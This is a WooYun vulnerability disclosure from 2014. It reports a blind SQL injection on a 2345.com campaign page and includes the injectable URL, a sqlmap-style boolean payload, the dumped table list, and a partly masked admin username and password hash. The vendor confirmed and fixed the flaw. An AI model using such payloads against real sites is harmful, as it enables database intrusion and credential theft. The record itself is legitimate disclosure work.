当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080150

漏洞标题:2345网址导航某站存在SQL注射漏洞(导致管理员信息泄漏)

相关厂商:2345网址导航

漏洞作者: 紫霞仙子

提交时间:2014-10-21 10:16

修复时间:2014-12-05 10:18

公开时间:2014-12-05 10:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-10-21: 细节已通知厂商并且等待厂商处理中
2014-10-21: 厂商已经确认,细节仅向厂商公开
2014-10-31: 细节向核心白帽子及相关领域专家公开
2014-11-10: 细节向普通白帽子公开
2014-11-20: 细节向实习白帽子公开
2014-12-05: 细节向公众公开

简要描述:

2345网址导航以26.5亿的巨额市值完成了A股上市。在被整个互联网行业看轻和遗忘了这么久之后,网址导航这个概念又一次进入大家的视线。

详细说明:

http://huodong.2345.com/liuyan2/new.php?c=comment&a=new_&z=12&v=2
---
Place: GET
Parameter: z
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: c=comment&a=new_&z=12 AND 4037=4037&v=2
---
[INFO] the back-end DBMS is MySQL

漏洞证明:

Database: huodong
[36 tables]
+------------------------+
| 2014guoqing_data |
| 2014guoqing_vote |
| 2014vote_data |
| 9years_contacts |
| 9years_projects |
| 9years_vlogs |
| chongzhi_error |
| chongzhi_guishu |
| chongzhi_order |
| chongzhi_order_his |
| chongzhi_order_log |
| chongzhi_order_process |
| cuangai_acl |
| cuangai_mode |
| cuangai_report |
| feedback |
| feedback_acl |
| feedback_admin |
| feedback_reply |
| feedback_temper |
| games |
| liuyan_comment |
| liuyan_zhuanti |
| pingan |
| qbi_error |
| qbi_order |
| qbi_order_his |
| qbi_order_log |
| qbi_order_process |
| shujia_eplan |
| shujia_plan |
| urlinfo |
| userinfo |
| usersched |
| vote_data |
| vote_tongji |
+------------------------+
Table: feedback_admin
[1 entry]
+-----+---------+-------------------------+----------------------------------+
| uid | acl | uname | upass |
+-----+---------+-------------------------+----------------------------------+
| 1 | GBADMIN | feedback_admin_0dff**** | c714ee05f********bf2bc688f182aba |
+-----+---------+-------------------------+----------------------------------+
current user: 'huodong2345@172.16.%'

修复方案:

~~~

版权声明:转载请注明来源 紫霞仙子@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-10-21 10:40

厂商回复:

非常感谢您对2345的关注及报我们的安全漏洞及不足,此漏洞已修复。十分感谢

最新状态:

暂无


漏洞评价:

评论

  1. 2014-11-20 14:17 | Ev1l ( 实习白帽子 | Rank:68 漏洞数:20 | 问题真实存在但影响不大。联系邮箱security...)

    洞主为了10rank强跑布尔注入点也是蛮拼的

  2. 2014-12-06 14:56 | 念念不忘 ( 路人 | Rank:5 漏洞数:2 | 求基友)

    洞烛为了10rank枪炮bool注入也是满拼的